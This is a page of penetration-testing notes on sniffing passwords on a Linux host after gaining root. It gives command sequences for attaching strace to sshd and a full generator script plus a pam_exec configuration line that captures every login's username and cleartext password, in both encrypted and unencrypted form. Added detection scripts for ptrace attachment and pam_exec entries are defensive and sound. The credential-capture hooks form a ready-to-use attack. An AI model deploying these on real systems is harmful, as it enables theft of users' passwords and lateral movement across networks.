# Sniffing Passwords

## Strace

With root access on a server we can attach to the SSH service and sniff usernames and passwords in plaintext if a user authenticates. This can be powerful when looking for new accounts to pivot with and/or higher privileged accounts.

```bash
[root@victimHost ~]# w
 15:05:18 up 26 days,  6:25,  2 users,  load average: 0.00, 0.05, 0.16
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
unixadm  pts/0    someHost         15:04    6.00s  0.03s  0.00s sshd: unixadm [priv]

[root@victimHost ~]# ps aux | grep ssh
root      1366  0.0  0.0 113000  4368 ?        Ss   Jun02   0:00 /usr/sbin/sshd -D
unixadm  28721  0.0  0.0 176412  2644 ?        S    10:04   0:00 sshd: unixadm@pts/0

[root@victimHost ~]# kill 28721
[root@victimHost ~]# strace -f -p 1366 -e trace=write -o data.log
strace: Process 1366 attached
```
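From the defender's side, the technique above has one reliable footprint: a process that is being traced reports a non-zero `TracerPid` in its `/proc/<pid>/status`, and `sshd` is not a process anything should be attached to on a production host. The following check is an added example written for these notes (it is not part of the original page); it reads `/proc`-style status files, which is a stable kernel interface, and takes an optional alternative root directory so it can be tested against constructed files.

```bash
#!/bin/sh
# Added example (not from the original notes): report processes whose
# /proc/<pid>/status shows a non-zero TracerPid, i.e. something has
# ptrace-attached to them. An attached tracer on sshd is what the strace
# technique above looks like from the host's own point of view.

# Print the TracerPid value from a single /proc/<pid>/status-style file.
# Argument: path to the status file. Prints "0" if the field is missing.
tracer_pid_from_status() {
    awk -F'\t' '$1 == "TracerPid:" { print $2; found = 1 }
                END { if (!found) print 0 }' "$1"
}

# Walk a /proc-like tree (default /proc) and print "pid name tracerpid"
# for every process that currently has a tracer attached.
list_traced_processes() {
    procroot="${1:-/proc}"
    for status in "$procroot"/[0-9]*/status; do
        [ -r "$status" ] || continue
        tracer=$(tracer_pid_from_status "$status")
        [ "$tracer" -ne 0 ] 2>/dev/null || continue
        pid=$(basename "$(dirname "$status")")
        name=$(awk -F'\t' '$1 == "Name:" { print $2 }' "$status")
        echo "$pid $name $tracer"
    done
}

# Number of traced processes named sshd; anything above 0 deserves a look.
count_traced_sshd() {
    list_traced_processes "$1" | awk '$2 == "sshd" { n++ } END { print n + 0 }'
}

# Run a live scan only when invoked with --scan, so sourcing the file is safe.
if [ "${1:-}" = "--scan" ]; then
    list_traced_processes
    echo "traced sshd processes: $(count_traced_sshd)"
fi
```

Run it as `sh traced.sh --scan` from cron or a monitoring agent. A point-in-time scan can miss a short attach, so pair it with an audit rule on the `ptrace` syscall (`-a always,exit -F arch=b64 -S ptrace -k ptrace_attach`) and alert on any hit whose target is `sshd`.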

***

## PAM

With root access on a server we can create a simple bash script to log all authentication requests handled through `pam.d`. The log data will show a timestamp, username, password and source IP, all in cleartext. This is of course very useful when trying to pivot and/or escalate privileges.

### Encrypted logs

The helper script below generates a `pam_log.sh` script to be uploaded to a target host.

```bash
#!/bin/bash
KEY_DIR="./ssh_key_pair"
PRIVATE_KEY_PATH="${KEY_DIR}/pam-id_rsa"
PUBLIC_KEY_PATH="${KEY_DIR}/pam-id_rsa.pub"
PEM_KEY_PATH="${KEY_DIR}/pam-id_rsa.pem"
LOG_SCRIPT_PATH="./pam_log.sh"

mkdir -p "$KEY_DIR"
echo "[+] Generating SSH key pair..."
ssh-keygen -t rsa -b 4096 -m PEM -f "$PRIVATE_KEY_PATH" -N "" >/dev/null

echo "[+] Extracting public key in PEM format..."
ssh-keygen -e -f "$PUBLIC_KEY_PATH" -m PEM > "${PEM_KEY_PATH}"

SSH_PUBLIC_KEY=$(cat "${PEM_KEY_PATH}" | sed ':a;N;$!ba;s/\n/\\n/g')

echo "[+] Creating the log script..."
cat <<EOF > "$LOG_SCRIPT_PATH"
#!/bin/bash
SSH_PUBLIC_KEY="$SSH_PUBLIC_KEY"
LOG_ENTRY=" \$(date) \${PAM_USER}, \$(cat -), From: \${PAM_RHOST}"
echo "\$LOG_ENTRY" | openssl pkeyutl -encrypt -inkey <(echo -e "\$SSH_PUBLIC_KEY" | sed 's/\\n/\n/g') -pubin | base64 >> /var/log/creds.log
EOF

chmod +x "$LOG_SCRIPT_PATH"
echo "[+] Generated log script: $LOG_SCRIPT_PATH"
echo -e "\n[i] Decrypt log: cat /var/log/creds.log | base64 -d | openssl pkeyutl -decrypt -inkey $PRIVATE_KEY_PATH"
```

```bash
kdev :: ~/log » ./create_pam_log.sh 
[+] Generating SSH key pair...
[+] Extracting public key in PEM format...
[+] Creating the log script...
[+] Generated log script: ./pam_log.sh

[i] Decrypt log: cat /var/log/creds.log | base64 -d | openssl pkeyutl -decrypt -inkey ./ssh_key_pair/pam-id_rsa
```

Upload `pam_log.sh` to the target and modify `/etc/pam.d/common-auth` to execute the script on authentication requests.

```bash
kdev :: ~ » echo "auth optional pam_exec.so quiet expose_authtok /home/void/log/pam_log.sh" | sudo tee -a /etc/pam.d/common-auth
```

Wait for a user to log in and reap the rewards. Other users are unable to read the content without the private key.

```bash
kdev :: ~/log » cat /var/log/creds.log
WNGIdThHgz[...]Hww2aa0=
kdev :: ~/log » cat /var/log/creds.log | base64 -d | openssl pkeyutl -decrypt -inkey ./ssh_key_pair/pam-id_rsa
 Fri Mar 14 11:18:14 CET 2025 void, Passw0rd!, From: ::1
```

### Unencrypted logs

If you don't care about the security aspects, or if the target doesn't have `openssl` or `base64` installed, you can instead use this simple unencrypted version to log authentication requests.

```bash
## Create the simple script to log logins
$ chmod 700 /usr/local/bin/capture.sh
$ cat /usr/local/bin/capture.sh                    
#!/bin/sh
echo " $(date) $PAM_USER, $(cat -), From: $PAM_RHOST" >> /var/log/creds.log

## Create log file and set high permissions so no unauthorized user reads it
$ touch /var/log/creds.log
$ chmod 600 /var/log/creds.log

## Edit /etc/pam.d/common-auth and add the following line
$ cat /etc/pam.d/common-auth
...
auth optional pam_exec.so quiet expose_authtok /usr/local/bin/capture.sh

## All services using PAM will now be logged to /var/log/creds.log in clear text
➜  ~ cat /var/log/creds.log
 Wed Nov 22 12:56:54 CET 2023 void, Passw0rd!, From: ::1
```
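Both variants above hook in through a single `pam_exec.so` line, and `expose_authtok` is the option that hands the cleartext password to the named program, so a PAM configuration audit is the cheapest detection. The script below is an added example written for these notes (not part of the original page); it scans a directory of PAM files (default `/etc/pam.d`, overridable for testing), skips comments, and reports every `pam_exec.so` entry with the program it runs, rating those carrying `expose_authtok` as HIGH.

```bash
#!/bin/sh
# Added example (not from the original notes): audit a PAM configuration
# directory for pam_exec.so entries. Any pam_exec line is worth reviewing;
# one that carries expose_authtok passes the cleartext password to the
# external program, which is exactly what the capture scripts above rely on.

# Print one line per pam_exec.so entry found under the given directory
# (default /etc/pam.d): "<severity> <file>:<line> <program>".
audit_pam_exec() {
    pamdir="${1:-/etc/pam.d}"
    for f in "$pamdir"/*; do
        [ -f "$f" ] || continue
        awk -v file="$f" '
            /^[[:space:]]*#/ { next }            # skip commented-out lines
            /pam_exec\.so/ {
                sev = ($0 ~ /expose_authtok/) ? "HIGH" : "REVIEW"
                prog = ""
                # the executed program is the last absolute path on the line
                for (i = 1; i <= NF; i++) if ($i ~ /^\//) prog = $i
                print sev " " file ":" NR " " prog
            }' "$f"
    done
}

# Number of HIGH findings; non-zero means a program somewhere receives
# cleartext passwords from PAM and must be justified or removed.
count_high_findings() {
    audit_pam_exec "$1" | awk '$1 == "HIGH" { n++ } END { print n + 0 }'
}

# Live run only when asked, so the file can be sourced by a test harness.
if [ "${1:-}" = "--scan" ]; then
    audit_pam_exec
    echo "high findings: $(count_high_findings)"
fi
```

Run `sh pam_audit.sh --scan` on a schedule and diff the output against a known-good baseline; on package-managed systems, `dpkg -V libpam-runtime` or `rpm -V pam` additionally flags modified stock files such as `common-auth`. A newly appeared, root-only file under `/var/log` that no logging daemon owns (the `creds.log` above) is the matching artifact to look for on disk.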
